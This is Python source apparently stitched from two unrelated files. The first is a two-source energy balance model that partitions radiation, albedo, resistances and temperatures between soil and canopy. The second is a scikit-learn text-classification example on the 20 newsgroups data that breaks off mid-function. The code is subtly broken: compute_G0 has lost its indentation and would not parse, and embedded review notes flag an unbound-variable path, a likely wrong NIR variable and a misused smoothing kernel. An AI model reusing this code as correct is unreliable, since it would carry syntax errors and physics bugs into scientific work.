def albedo_separation(albedo, Rs_1, F, fc, aleafv, aleafn, aleafl, adeadv, adeadn, adeadl, z, t_air, zs, control):
    """Partition shortwave radiation and albedo into canopy and soil
    components (Campbell & Norman 1998).

    Iteratively adjusts the soil visible reflectance (rsoilv) and green
    fraction (fg) until the modeled scene albedo matches the observed
    'albedo'.

    Returns (Rs_c, Rs_s, albedo_c, albedo_s, e_atm, rsoilv_itr, fg_itr).

    NOTE(review): when control != 1, rsoilv / fg / z_inter are never
    assigned (the else-branch is commented out) and rsoilv_itr / fg_itr
    are never bound before the return — this path raises NameError.
    Confirm that control is always 1 at the call sites.
    """
    # ; Compute Solar Components and atmospheric properties (Campbell & Norman 1998)
    # DAYTIME
    # Calculate potential (clear-sky) VIS and NIR solar components
    airmas = (np.sqrt(np.cos(zs) ** 2 + .0025) - np.cos(zs)) / .00125  # Correct for curvature of atmos in airmas
    zs_temp = zs.copy()
    zs_temp[np.rad2deg(zs) >= 89.5] = np.deg2rad(89.5)
    ind = np.rad2deg(zs) < 89.5
    airmas[ind] = (airmas[ind] - 2.8 / (
        90. - np.rad2deg(zs_temp[ind])) ** 2.)  # Correct for refraction(good up to 89.5 deg.)
    potbm1 = 600. * np.exp(-.160 * airmas)  # potential direct beam (VIS)
    potvis = (potbm1 + (600. - potbm1) * .4) * np.cos(zs)
    potdif = (600. - potbm1) * .4 * np.cos(zs)
    uu = 1.0 / np.cos(zs)
    uu[uu <= 0.01] = 0.01
    axlog = np.log10(uu)
    a = 10 ** (-1.195 + .4459 * axlog - .0345 * axlog * axlog)
    watabs = 1320. * a  # water-vapour absorption
    potbm2 = 720. * np.exp(-.05 * airmas) - watabs  # potential direct beam (NIR)
    evaL = (720. - potbm2 - watabs) * .54 * np.cos(zs)
    potnir = evaL + potbm2 * np.cos(zs)
    # Clear-sky fraction: observed / potential shortwave, clamped to (0.01, 1].
    fclear = Rs_1 / (potvis + potnir)
    fclear[fclear > 1.] = 1.
    fclear[np.cos(zs) <= 0.01] = 1.
    fclear[fclear <= 0.01] = 0.01
    # Partition SDN into VIS and NIR
    fvis = potvis / (potvis + potnir)
    fnir = potnir / (potvis + potnir)
    # Estimate direct beam and diffuse fraction in VIS and NIR wavebands
    fb1 = potbm1 * np.cos(zs) / potvis  # direct-beam fraction, VIS
    fb2 = potbm2 * np.cos(zs) / potnir  # direct-beam fraction, NIR
    ratiox = fclear.copy()
    ratiox[fclear > 0.9] = 0.9
    dirvis = fb1 * (1. - ((.9 - ratiox) / .7) ** .6667)
    ind = dirvis >= fb1
    dirvis[ind] = fb1[ind]
    ratiox = fclear.copy()
    ratiox[fclear > 0.88] = 0.88
    # NOTE(review): the NIR band uses fb1 here and in the clamp below,
    # where the VIS/NIR symmetry suggests fb2 — possible copy-paste slip;
    # verify against the original IDL DisALEXI code before changing.
    dirnir = fb1 * (1. - ((.88 - ratiox) / .68) ** .6667)
    ind = dirnir >= fb2
    dirnir[ind] = fb1[ind]
    ind = np.logical_and((dirvis < 0.01), (dirnir > 0.01))
    dirvis[ind] = 0.011
    ind = np.logical_and((dirnir < 0.01), (dirvis > 0.01))
    dirnir[ind] = 0.011
    difvis = 1. - dirvis
    difnir = 1. - dirnir
    # Correction for NIGHTIME
    ind = np.cos(zs) <= 0.01
    fvis[ind] = 0.5
    fnir[ind] = 0.5
    difvis[ind] = 1.
    difnir[ind] = 1.
    dirvis[ind] = 0.
    dirnir[ind] = 0.
    Rs0 = potvis + potnir
    Rs0[ind] = 0.
    # apparent emissivity (Sedlar and Hock, 2009: Cryosphere 3:75-84)
    e_atm = 1. - (0.2811 * (
        np.exp(-0.0003523 * ((t_air - 273.16) ** 2.))))  # atmospheric emissivity (clear-sly) Idso and Jackson (1969)
    fclear[Rs0 <= 50.] = 1.
    # **********************************************
    # Compute Albedo
    ratio_soil = 2.  # NIR/VIS soil reflectance ratio
    if control == 1:
        rsoilv = np.tile(0.12, np.shape(F))  # initial soil VIS reflectance
        fg = np.tile(1., np.shape(albedo))   # initial green fraction
        z_inter = 9                          # number of adjustment iterations
    # else:
    #     rsoilv = rsoilv_itr
    #     fg = fg_itr
    #     z_inter = 0.
    for zzz in range(z_inter + 1):  # +1 to do what IDL does
        rsoiln = rsoilv * ratio_soil
        # Weighted live/dead leaf average properties
        ameanv = aleafv * fg + adeadv * (1. - fg)
        ameann = aleafn * fg + adeadn * (1. - fg)
        ameanl = aleafl * fg + adeadl * (1. - fg)
        # DIFFUSE COMPONENT
        # *******************************
        # canopy reflection (deep canopy)
        akd = -0.0683 * np.log(F) + 0.804  # Fit to Fig 15.4 for x=1
        rcpyn = (1.0 - np.sqrt(ameann)) / (1.0 + np.sqrt(ameann))  # Eq 15.7
        rcpyv = (1.0 - np.sqrt(ameanv)) / (1.0 + np.sqrt(ameanv))
        rcpyl = (1.0 - np.sqrt(ameanl)) / (1.0 + np.sqrt(ameanl))
        rdcpyn = 2.0 * akd * rcpyn / (akd + 1.0)  # Eq 15.8
        rdcpyv = 2.0 * akd * rcpyv / (akd + 1.0)
        rdcpyl = 2.0 * akd * rcpyl / (akd + 1.0)
        # canopy transmission (VIS)
        expfac = np.sqrt(ameanv) * akd * F
        expfac[expfac < 0.001] = 0.001
        xnum = (rdcpyv * rdcpyv - 1.0) * np.exp(-expfac)
        xden = (rdcpyv * rsoilv - 1.0) + rdcpyv * (rdcpyv - rsoilv) * np.exp(-2.0 * expfac)
        taudv = xnum / xden  # Eq 15.11
        # canopy transmission (NIR)
        expfac = np.sqrt(ameann) * akd * F
        expfac[expfac < 0.001] = 0.001
        xnum = (rdcpyn * rdcpyn - 1.0) * np.exp(-expfac)
        xden = (rdcpyn * rsoiln - 1.0) + rdcpyn * (rdcpyn - rsoiln) * np.exp(-2.0 * expfac)
        taudn = xnum / xden  # Eq 15.11
        # canopy transmission (LW)
        taudl = np.exp(-np.sqrt(ameanl) * akd * F)
        # diffuse albedo for generic canopy
        fact = ((rdcpyn - rsoiln) / (rdcpyn * rsoiln - 1.0)) * np.exp(-2.0 * np.sqrt(ameann) * akd * F)  # Eq 15.9
        albdn = (rdcpyn + fact) / (1.0 + rdcpyn * fact)
        fact = ((rdcpyv - rsoilv) / (rdcpyv * rsoilv - 1.0)) * np.exp(-2.0 * np.sqrt(ameanv) * akd * F)  # Eq 15.9
        albdv = (rdcpyv + fact) / (1.0 + rdcpyv * fact)
        # BEAM COMPONENT
        # *******************************
        # canopy reflection (deep canopy)
        akb = 0.5 / np.cos(zs)
        akb[np.cos(zs) <= 0.01] = 0.5
        rcpyn = (1.0 - np.sqrt(ameann)) / (1.0 + np.sqrt(ameann))  # Eq 15.7
        rcpyv = (1.0 - np.sqrt(ameanv)) / (1.0 + np.sqrt(ameanv))
        rbcpyn = 2.0 * akb * rcpyn / (akb + 1.0)  # Eq 15.8
        rbcpyv = 2.0 * akb * rcpyv / (akb + 1.0)
        # beam albedo for generic canopy
        fact = ((rbcpyn - rsoiln) / (rbcpyn * rsoiln - 1.0)) * np.exp(-2.0 * np.sqrt(ameann) * akb * F)  # Eq 15.9
        albbn = (rbcpyn + fact) / (1.0 + rbcpyn * fact)
        fact = ((rbcpyv - rsoilv) / (rbcpyv * rsoilv - 1.0)) * np.exp(-2.0 * np.sqrt(ameanv) * akb * F)  # Eq 15.9
        albbv = (rbcpyv + fact) / (1.0 + rbcpyv * fact)
        # weighted albedo (canopy)
        albedo_c = fvis * (dirvis * albbv + difvis * albdv) + fnir * (dirnir * albbn + difnir * albdn)
        ind = np.cos(zs) <= 0.01
        albedo_c[ind] = (fvis[ind] * (difvis[ind] * albdv[ind]) + fnir[ind] * (difnir[ind] * albdn[ind]))
        albedo_s = fvis * rsoilv + fnir * rsoiln
        albedo_avg = (fc * albedo_c) + ((1 - fc) * albedo_s)
        diff = albedo_avg - albedo
        # Nudge rsoilv (sparse canopy) or fg (dense canopy) toward the
        # observed albedo for the next iteration.
        ind = np.logical_and((fc < 0.75), (diff <= -0.01))
        rsoilv[ind] = rsoilv[ind] + 0.01
        ind = np.logical_and((fc < 0.75), (diff > 0.01))
        rsoilv[ind] = rsoilv[ind] - 0.01
        ind = np.logical_and((fc >= 0.75), (diff <= -0.01))
        fg[ind] = fg[ind] - 0.05
        ind = np.logical_and((fc >= 0.75), (diff > 0.01))
        fg[ind] = fg[ind] + 0.05
        fg[fg > 1.] = 1.
        fg[fg < 0.01] = 0.01
    if control == 1:
        fg_itr = fg
        rsoilv_itr = rsoilv
    ind = abs(diff) > 0.05
    albedo_c[ind] = albedo[ind]
    albedo_s[ind] = albedo[ind]  # if a solution is not reached, alb_c=alb_s=alb
    # Direct beam+scattered canopy transmission coeff (visible)
    expfac = np.sqrt(ameanv) * akb * F
    xnum = (rbcpyv * rbcpyv - 1.0) * np.exp(-expfac)
    xden = (rbcpyv * rsoilv - 1.0) + rbcpyv * (rbcpyv - rsoilv) * np.exp(-2.0 * expfac)
    taubtv = xnum / xden  # Eq 15.11
    # Direct beam+scattered canopy transmission coeff (NIR)
    expfac = np.sqrt(ameann) * akb * F
    xnum = (rbcpyn * rbcpyn - 1.0) * np.exp(-expfac)
    xden = (rbcpyn * rsoiln - 1.0) + rbcpyn * (rbcpyn - rsoiln) * np.exp(-2.0 * expfac)
    taubtn = xnum / xden  # Eq 15.11
    # shortwave radition components
    tausolar = fvis * (difvis * taudv + dirvis * taubtv) + fnir * (difnir * taudn + dirnir * taubtn)
    Rs_c = Rs_1 * (1. - tausolar)  # shortwave absorbed by the canopy
    Rs_s = Rs_1 * tausolar         # shortwave reaching the soil
    return Rs_c, Rs_s, albedo_c, albedo_s, e_atm, rsoilv_itr, fg_itr
def compute_G0(Rn, Rn_s, albedo, ndvi, t_rise, t_end, time, EF_s):
w = 1 / (1 + (EF_s / 0.5) ** 8.)
c_g = (w * 0.35) + (
(1 - w) * 0.31) # maximum fraction of Rn,s that become G0 (0.35 for dry soil and 0.31 for wet soil)
t_g = (w * 100000.) + ((1 - w) * 74000.)
tnoon = 0.5 * (t_rise + t_end)
t_g0 = (time - tnoon) * 3600.
G0 = c_g * np.cos(2 * np.pi * (t_g0 + 10800.) / t_g) * Rn_s
ind = np.logical_and(ndvi <= 0, albedo <= 0.05)
G0[ind] = Rn[ind] * 0.5
return G0
# PRO compute_resistence, U, Ts, Tc, hc, F, d0, z0m, z0h, z_u, z_T, xl, leaf, leafs, leafc, fm, fh, fm_h
#
# COMMON com_res, r_ah, r_s, r_x, u_attr
def compute_resistence(U, Ts, Tc, hc, F, d0, z0m, z0h, z_u, z_T, xl, leaf, leafs, leafc, fm, fh, fm_h):
    """Resistance network for the two-source energy balance.

    From wind speed U, surface/canopy temperatures and roughness
    parameters, computes:
      r_ah    aerodynamic resistance air <-> canopy air space [s/m]
      r_s     resistance of the air layer between soil and canopy [s/m]
      r_x     bulk canopy boundary-layer resistance [s/m]
      u_attr  friction velocity [m/s]
    All inputs must be numpy arrays (the boolean-mask assignments below
    rely on it).
    """
    c_a = 0.004  # Free convective velocity constant for r_s modelling
    c_b = 0.012  # Empirical constant for r_s modelling
    c_c = 0.0025  # Empirical constant for r_s modelling (new formulation Kustas and Norman, 1999)
    C = 175.  # Parameter for canopy boundary-layer resistance (C=90 Grace '81, C=175 Cheubouni 2001, 144 Li '98)
    # Computation of friction velocity and aerodynamic resistance
    u_attr = 0.41 * U / ((np.log((z_u - d0) / z0m)) - fm)
    u_attr[u_attr == 0] = 10.
    u_attr[u_attr < 0] = 0.01
    r_ah = ((np.log((z_T - d0) / z0h)) - fh) / u_attr / 0.41
    r_ah[r_ah == 0] = 500.
    r_ah[r_ah <= 1.] = 1.
    # Computation of the resistance of the air between soil and canopy space
    Uc = u_attr / 0.41 * ((np.log((hc - d0) / z0m)) - fm_h)  # wind speed at canopy top
    Uc[Uc <= 0] = 0.1
    # Presumably the wind speed near the soil surface (0.05 m) — verify.
    Us = Uc * np.exp(-leaf * (1. - (0.05 / hc)))
    r_ss = 1. / (c_a + (c_b * (Uc * np.exp(-leafs * (1. - (0.05 / hc))))))
    r_s1 = 1. / ((((abs(Ts - Tc)) ** (1. / 3.)) * c_c) + (c_b * Us))
    r_s2 = 1. / (c_a + (c_b * Us))
    r_s = (((r_ss - 1.) / 0.09 * (F - 0.01)) + 1.)
    # NOTE: the successive masked assignments intentionally overwrite
    # earlier choices, so their order matters.
    r_s[F > 0.1] = r_s1[F > 0.1]  # linear fuction between 0(bare soil) anf the value at F=0.1
    r_s[abs(Ts - Tc) < 1.] = r_s2[abs(Ts - Tc) < 1.]
    r_s[F > 3.] = r_s2[F > 3.]
    # Computation of the canopy boundary layer resistance
    Ud = Uc * np.exp(-leafc * (1. - ((d0 + z0m) / hc)))
    Ud[Ud <= 0.] = 100.  # sentinel: flagged pixels get r_x = 0.1 below
    r_x = C / F * ((xl / Ud) ** 0.5)
    r_x[Ud == 100.] = 0.1
    return r_ah, r_s, r_x, u_attr
# PRO compute_Rn, albedo_c, albedo_s, t_air, Tc, Ts, e_atm, Rs_c, Rs_s, F
#
# COMMON com_Rn, Rn_s, Rn_c, Rn
def compute_Rn(albedo_c, albedo_s, t_air, Tc, Ts, e_atm, Rs_c, Rs_s, F):
    """Partition net radiation between the soil and canopy layers.

    Shortwave terms use the per-layer albedos; longwave exchange between
    sky, canopy and soil is attenuated through the canopy with the
    extinction coefficient kL applied to leaf area F.

    Returns (Rn_s, Rn_c, Rn): soil, canopy and total net radiation.
    """
    kL = 0.95     # long-wave extinction coefficient [-]
    eps_s = 0.94  # Soil Emissivity [-]
    eps_c = 0.99  # Canopy emissivity [-]
    sb = 0.0000000567  # Stefan-Boltzmann constant [W m-2 K-4]
    canopy_emit = eps_c * sb * (Tc ** 4.)
    soil_emit = eps_s * sb * (Ts ** 4.)
    sky_emit = e_atm * sb * (t_air ** 4.)
    # Fraction of longwave passing straight through the canopy.
    gap = np.exp(-kL * F)
    Rn_c = ((1. - albedo_c) * Rs_c) + ((1. - gap) * (sky_emit + soil_emit - 2. * canopy_emit))
    Rn_s = ((1. - albedo_s) * Rs_s) + (gap * sky_emit) + ((1. - gap) * canopy_emit) - soil_emit
    return Rn_s, Rn_c, Rn_s + Rn_c
# PRO temp_separation, H_c, fc, t_air, t0, r_ah, r_x, r_s, r_air
#
# COMMON com_sep, Tc, Ts, Tac
def temp_separation(H_c, fc, t_air, t0, r_ah, r_x, r_s, r_air, cp):
    """Partition the radiometric surface temperature t0 into canopy (Tc),
    soil (Ts) and canopy-air-space (Tac) temperatures.

    Linearized solution of the two-source temperature decomposition;
    H_c is the canopy sensible heat flux, fc the fractional cover,
    r_* the network resistances, r_air the air density and cp the
    specific heat of air.  All inputs except cp are numpy arrays.
    """
    # First-order (linearized) canopy temperature estimate.
    Tc_lin = ((t_air / r_ah) + (t0 / r_s / (1. - fc)) + (
        H_c * r_x / r_air / cp * ((1. / r_ah) + (1. / r_s) + (1. / r_x)))) / (
        (1. / r_ah) + (1. / r_s) + (fc / r_s / (1. - fc)))
    Td = (Tc_lin * (1 + (r_s / r_ah))) - (H_c * r_x / r_air / cp * (1. + (r_s / r_x) + (r_s / r_ah))) - (
        t_air * r_s / r_ah)
    # Second-order correction to Tc from the quartic (radiative) balance.
    delta_Tc = ((t0 ** 4.) - (fc * (Tc_lin ** 4.)) - ((1. - fc) * (Td ** 4.))) / (
        (4. * (1. - fc) * (Td ** 3.) * (1. + (r_s / r_ah))) + (4. * fc * (Tc_lin ** 3.)))
    Tc = (Tc_lin + delta_Tc)
    # At near-full or near-zero cover the decomposition is degenerate;
    # fall back to the composite temperature.
    Tc[fc < 0.10] = t0[fc < 0.10]
    Tc[fc > 0.90] = t0[fc > 0.90]
    # ======get Ts==================================================================
    Delta = (t0 ** 4.) - (fc * (Tc ** 4.))
    Delta[Delta <= 0.] = 10.  # guard before the 4th root
    Ts = (Delta / (1 - fc)) ** 0.25
    # Where the quartic residual was non-positive, use a linear split.
    ind = ((t0 ** 4) - (fc * Tc ** 4.)) <= 0.
    Ts[ind] = (t0[ind] - (fc[ind] * Tc[ind])) / (1 - fc[ind])
    Ts[fc < 0.1] = t0[fc < 0.1]
    Ts[fc > 0.9] = t0[fc > 0.9]
    # Clamp both temperatures to within [-10, +50] K of the air temperature.
    ind = (Tc <= (t_air - 10.))
    Tc[ind] = (t_air[ind] - 10.)
    ind = (Tc >= t_air + 50.)
    Tc[ind] = (t_air[ind] + 50.)
    ind = (Ts <= (t_air - 10.))
    Ts[ind] = (t_air[ind] - 10.)
    ind = (Ts >= t_air + 50.)
    Ts[ind] = (t_air[ind] + 50.)
    # Canopy-air-space temperature: resistance-weighted mean.
    Tac = ((((t_air) / r_ah) + ((Ts) / r_s) + ((Tc) / r_x)) / ((1 / r_ah) + (1 / r_s) + (1 / r_x)))
    return Tc, Ts, Tac
# PRO compute_stability, H, t0, r_air, u_attr, z_u, z_T, hc, d0, z0m, z0h
#
# COMMON com_stab, fm, fh, fm_h
def compute_stability(H, t0, r_air, cp, u_attr, z_u, z_T, hc, d0, z0m, z0h):
    """Monin-Obukhov stability correction functions.

    Returns (fm, fh, fm_h): the momentum correction at measurement height
    z_u, the heat correction at z_T, and the momentum correction at
    canopy height hc.  Corrections are only applied where the Obukhov
    length is within (-100, 100); elsewhere they stay zero.

    NOTE(review): t0 is modified IN PLACE (the 273.16 value is mapped to
    373.16) — callers see the change; confirm this is intended.
    """
    t0[t0 == 273.16] = 373.16
    # Obukhov length (0.41 = von Karman, 9.806 = g).
    L_ob = -(r_air * cp * t0 * (u_attr ** 3.0) / 0.41 / 9.806 / H)
    L_ob[L_ob >= 0.] = -99.  # force stable cases to a sentinel value
    mm = ((1. - (16. * (z_u - d0) / L_ob)) ** 0.25)
    mm_h = ((1. - (16. * (hc - d0) / L_ob)) ** 0.25)
    mh = ((1. - (16. * (z_T - d0) / L_ob)) ** 0.25)
    ind = L_ob == -99.
    mm[ind] = 0.
    mm_h[ind] = 0.
    mh[ind] = 0.
    fm = np.zeros(mh.shape)
    ind = np.logical_and((L_ob < 100.), (L_ob > (-100.)))
    fm[ind] = ((2.0 * np.log((1.0 + mm[ind]) / 2.0)) + (np.log((1.0 + (mm[ind] ** 2.)) / 2.0)) - (
        2.0 * np.arctan(mm[ind])) + (np.pi / 2.))
    fm_h = np.zeros(mh.shape)
    fm_h[ind] = ((2.0 * np.log((1.0 + mm_h[ind]) / 2.0)) + (np.log((1.0 + (mm_h[ind] ** 2.)) / 2.0)) - (
        2.0 * np.arctan(mm_h[ind])) + (np.pi / 2.))
    fh = np.zeros(mh.shape)
    fh[ind] = ((2.0 * np.log((1.0 + (mh[ind] ** 2.)) / 2.0)))
    # Presumably avoids a zero denominator in the wind-profile terms
    # (log((z-d0)/z0) - fm) used downstream — verify.
    ind = (fm == (np.log((z_u - d0) / z0m)))
    fm[ind] = fm[ind] + 1.
    ind = (fm_h == (np.log((hc - d0) / z0m)))
    fm_h[ind] = fm_h[ind] + 1.
    return fm, fh, fm_h
def smooth(signal, owidth, edge_truncate=False):
    """Replicate the IDL ``SMOOTH()`` boxcar average for a 1-D array.

    Parameters
    ----------
    signal : array-like
        The array to be smoothed.
    owidth : :class:`int`
        Width of the smoothing window; an even width is incremented to
        the next odd value, and a width below 3 returns `signal`
        unchanged.
    edge_truncate : :class:`bool`, optional
        When ``True``, points within half a window of either edge are
        smoothed too, padding with the edge value; otherwise they keep
        their original values.

    Returns
    -------
    array-like
        A smoothed array with the same dimensions and type as `signal`.

    References
    ----------
    http://www.exelisvis.com/docs/SMOOTH.html
    """
    width = owidth + 1 if owidth % 2 == 0 else owidth
    if width < 3:
        return signal
    n = signal.size
    half = int(width / 2)
    first = int((width - 1) / 2)          # first fully-covered index
    last = n - int((width + 1) / 2)       # last fully-covered index
    fwidth = float(width)
    out = signal.copy()
    for i in range(n):
        if i < first:
            if edge_truncate:
                # Pad the missing left side with the first sample.
                out[i] = (np.nansum(signal[0:first + i + 1]) +
                          (first - i) * signal[0]) / fwidth
        elif i > last:
            if edge_truncate:
                # Pad the missing right side with the last sample.
                out[i] = (np.nansum(signal[i - first:n]) +
                          (i - last) * signal[n - 1]) / fwidth
        else:
            out[i] = np.nansum(signal[i - half:i + half + 1]) / fwidth
    return out
def Smooth(v1, w, nanopt):
    """Boxcar-smooth a 2-D array with a square window of width *w*.

    Parameters
    ----------
    v1 : numpy.ndarray
        Input 2-D array.
    w : int
        Width of the square window along one dimension.  An even width
        is bumped to the next odd number so the window has a centre.
    nanopt : str
        ``'replace'`` to ignore NaNs inside the window (average only the
        finite values); any other value propagates NaNs into the mean.

    Returns
    -------
    numpy.ndarray
        Copy of *v1* where each interior pixel is replaced by its window
        average; border pixels (within ``w // 2`` of an edge) keep their
        original values.
    """
    # make a copy of the array for the output:
    vout = np.copy(v1)
    # If w is even, add one
    if w % 2 == 0:
        w = w + 1
    # get the size of each dim of the input:
    r, c = v1.shape
    # Assume that w, the width of the window is always square.
    # BUGFIX: use floor division -- the original Python 2 style "/"
    # produces floats under Python 3, making range() and the slice
    # indices below raise TypeError.
    startrc = (w - 1) // 2
    stopr = r - ((w + 1) // 2) + 1
    stopc = c - ((w + 1) // 2) + 1
    half = w // 2
    # For all pixels within the border defined by the box size, calculate
    # the average in the window.  Two options: ignore NaNs and replace the
    # value where possible, or propagate the NaNs.
    for col in range(startrc, stopc):
        # Calculate the window start and stop columns
        startwc = col - half
        stopwc = col + half + 1
        for row in range(startrc, stopr):
            # Calculate the window start and stop rows
            startwr = row - half
            stopwr = row + half + 1
            # Extract the window
            window = v1[startwr:stopwr, startwc:stopwc]
            if nanopt == 'replace':
                # If we're replacing NaNs, select only the finite elements
                window = window[np.isfinite(window)]
            # Calculate the mean of the window
            vout[row, col] = np.mean(window)
    return vout
# FUNCTION interp_ta, Ta, bad, rid
# ;mask_full = where(Ta ne bad)
# ;t_air = Ta[mask_full]
# hold=where(Ta EQ bad, vct)
# if vct GT 0 then Ta[where(Ta EQ bad)]=!values.f_nan
# t_air=Ta
# ta_m = mean(t_air,/nan)
# ta_v = sqrt(variance(t_air,/nan))
#
# mask_bad = where(abs(Ta-ta_m) gt 10*ta_v, c_bad)
# Ta_temp = Ta
# IF c_bad ne 0 THEN BEGIN
# Ta_temp[mask_bad] = !Values.F_NAN
# ENDIF
#
# rid2=sqrt(rid)
# Ta_smooth = SMOOTH(Ta_temp, rid2/1., /EDGE_TRUNCATE, MISSING=ta_m, /NAN)
#
# RETURN, Ta_smooth
# END
def interp_ta(Ta, coarseRes, fineRes):
    # Smooth an air-temperature grid for resampling from coarseRes to
    # fineRes.  NOTE: Ta is modified in place (outlier pixels are set to
    # NaN) before smoothing.
    # Ratio of coarse to fine pixel areas; its square root is the window
    # width expressed in fine-resolution pixels.
    course2fineRatio = coarseRes ** 2 / fineRes ** 2
    rid2 = int(np.sqrt(course2fineRatio))
    ta_m = np.nanmean(Ta)
    ta_v = np.nanstd(Ta)
    # Flag pixels more than 10 standard deviations from the mean as bad
    # and blank them so they do not bias the smoothed field.
    mask_bad = (abs(Ta - ta_m) > 10. * ta_v)
    Ta[np.where(mask_bad)] = np.nan
    # =====using scipy==========
    # local_mean = ndimage.uniform_filter(Ta, size=rid2,mode='nearest')
    # return smooth(Ta, rid2,True)
    # return Smooth(Ta, rid2, 'replace')
    # =====using astropy==============
    # We smooth with a Gaussian kernel with stddev=1
    # It is a 9x9 array
    # NOTE(review): rid2 (an int window width) is replaced here by a
    # Gaussian2DKernel and then passed to Box2DKernel, which expects a
    # width -- this chaining looks unintended; confirm against the
    # astropy.convolution API before relying on this function.
    rid2 = Gaussian2DKernel(rid2)
    box_2D_kernel = Box2DKernel(rid2)
    local_mean = convolve(Ta, box_2D_kernel)
    return local_mean
| |
"""
======================================================
Classification of text documents using sparse features
======================================================
This is an example showing how scikit-learn can be used to classify documents
by topics using a bag-of-words approach. This example uses a scipy.sparse
matrix to store the features and demonstrates various classifiers that can
efficiently handle sparse matrices.
The dataset used in this example is the 20 newsgroups dataset. It will be
automatically downloaded, then cached.
The bar plot indicates the accuracy, training time (normalized) and test time
(normalized) of each classifier.
"""
# Author: Peter Prettenhofer <peter.prettenhofer@gmail.com>
# Olivier Grisel <olivier.grisel@ensta.org>
# Mathieu Blondel <mathieu@mblondel.org>
# Lars Buitinck <L.J.Buitinck@uva.nl>
# License: BSD 3 clause
from __future__ import print_function
import logging
import numpy as np
from optparse import OptionParser
import sys
from time import time
import matplotlib.pyplot as plt
from sklearn.datasets import fetch_20newsgroups
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.feature_extraction.text import HashingVectorizer
from sklearn.feature_selection import SelectKBest, chi2
from sklearn.linear_model import RidgeClassifier
from sklearn.pipeline import Pipeline
from sklearn.svm import LinearSVC
from sklearn.linear_model import SGDClassifier
from sklearn.linear_model import Perceptron
from sklearn.linear_model import PassiveAggressiveClassifier
from sklearn.naive_bayes import BernoulliNB, MultinomialNB
from sklearn.neighbors import KNeighborsClassifier
from sklearn.neighbors import NearestCentroid
from sklearn.ensemble import RandomForestClassifier
from sklearn.utils.extmath import density
from sklearn import metrics
# Display progress logs on stdout
logging.basicConfig(level=logging.INFO,
                    format='%(asctime)s %(levelname)s %(message)s')
# parse commandline arguments
op = OptionParser()
op.add_option("--report",
              action="store_true", dest="print_report",
              help="Print a detailed classification report.")
op.add_option("--chi2_select",
              action="store", type="int", dest="select_chi2",
              help="Select some number of features using a chi-squared test")
op.add_option("--confusion_matrix",
              action="store_true", dest="print_cm",
              help="Print the confusion matrix.")
op.add_option("--top10",
              action="store_true", dest="print_top10",
              help="Print ten most discriminative terms per class"
                   " for every classifier.")
op.add_option("--all_categories",
              action="store_true", dest="all_categories",
              help="Whether to use all categories or not.")
op.add_option("--use_hashing",
              action="store_true",
              help="Use a hashing vectorizer.")
op.add_option("--n_features",
              action="store", type=int, default=2 ** 16,
              help="n_features when using the hashing vectorizer.")
op.add_option("--filtered",
              action="store_true",
              help="Remove newsgroup information that is easily overfit: "
                   "headers, signatures, and quoting.")
(opts, args) = op.parse_args()
if len(args) > 0:
    # op.error() prints usage and exits; sys.exit(1) is a safety net in
    # case a subclass overrides error() without exiting.
    op.error("this script takes no arguments.")
    sys.exit(1)
print(__doc__)
op.print_help()
print()
###############################################################################
# Load some categories from the training set
if opts.all_categories:
    categories = None
else:
    # A small, contrasting subset keeps the demo fast.
    categories = [
        'alt.atheism',
        'talk.religion.misc',
        'comp.graphics',
        'sci.space',
    ]
if opts.filtered:
    # Strip metadata that makes the classification task artificially easy.
    remove = ('headers', 'footers', 'quotes')
else:
    remove = ()
print("Loading 20 newsgroups dataset for categories:")
print(categories if categories else "all")
# Downloaded on first use, then cached locally by scikit-learn.
data_train = fetch_20newsgroups(subset='train', categories=categories,
                                shuffle=True, random_state=42,
                                remove=remove)
data_test = fetch_20newsgroups(subset='test', categories=categories,
                               shuffle=True, random_state=42,
                               remove=remove)
print('data loaded')
categories = data_train.target_names  # for case categories == None
def size_mb(docs):
    """Return the total UTF-8 encoded size of *docs* in (decimal) MB."""
    total_bytes = 0
    for doc in docs:
        total_bytes += len(doc.encode('utf-8'))
    return total_bytes / 1e6
data_train_size_mb = size_mb(data_train.data)
data_test_size_mb = size_mb(data_test.data)
print("%d documents - %0.3fMB (training set)" % (
    len(data_train.data), data_train_size_mb))
print("%d documents - %0.3fMB (test set)" % (
    len(data_test.data), data_test_size_mb))
print("%d categories" % len(categories))
print()
# split a training set and a test set
y_train, y_test = data_train.target, data_test.target
print("Extracting features from the training data using a sparse vectorizer")
t0 = time()
if opts.use_hashing:
    # Stateless hashing vectorizer: no fitting needed, fixed feature space.
    vectorizer = HashingVectorizer(stop_words='english', non_negative=True,
                                   n_features=opts.n_features)
    X_train = vectorizer.transform(data_train.data)
else:
    vectorizer = TfidfVectorizer(sublinear_tf=True, max_df=0.5,
                                 stop_words='english')
    X_train = vectorizer.fit_transform(data_train.data)
duration = time() - t0
print("done in %fs at %0.3fMB/s" % (duration, data_train_size_mb / duration))
print("n_samples: %d, n_features: %d" % X_train.shape)
print()
# The test set must be transformed with the vectorizer fitted (or
# configured) on the training set so feature indices line up.
print("Extracting features from the test data using the same vectorizer")
t0 = time()
X_test = vectorizer.transform(data_test.data)
duration = time() - t0
print("done in %fs at %0.3fMB/s" % (duration, data_test_size_mb / duration))
print("n_samples: %d, n_features: %d" % X_test.shape)
print()
# mapping from integer feature name to original token string
if opts.use_hashing:
    # Hashed features are anonymous -- no inverse vocabulary exists.
    feature_names = None
else:
    feature_names = vectorizer.get_feature_names()
if opts.select_chi2:
    # Optional univariate feature selection on the training labels.
    print("Extracting %d best features by a chi-squared test" %
          opts.select_chi2)
    t0 = time()
    ch2 = SelectKBest(chi2, k=opts.select_chi2)
    X_train = ch2.fit_transform(X_train, y_train)
    X_test = ch2.transform(X_test)
    if feature_names:
        # keep selected feature names
        feature_names = [feature_names[i] for i
                         in ch2.get_support(indices=True)]
    print("done in %fs" % (time() - t0))
    print()
if feature_names:
    feature_names = np.asarray(feature_names)
def trim(s):
    """Trim string to fit on terminal (assuming 80-column display)"""
    if len(s) <= 80:
        return s
    return s[:77] + "..."
###############################################################################
# Benchmark classifiers
def benchmark(clf):
    """Fit *clf* on the training split, score it on the test split and
    print a report.

    Relies on module-level globals: X_train, y_train, X_test, y_test,
    opts, feature_names and categories.

    Returns a ``(classifier_name, accuracy, train_time, test_time)``
    tuple for the summary plot.
    """
    print('_' * 80)
    print("Training: ")
    print(clf)
    t0 = time()
    clf.fit(X_train, y_train)
    train_time = time() - t0
    print("train time: %0.3fs" % train_time)
    t0 = time()
    pred = clf.predict(X_test)
    test_time = time() - t0
    print("test time: %0.3fs" % test_time)
    score = metrics.accuracy_score(y_test, pred)
    print("accuracy: %0.3f" % score)
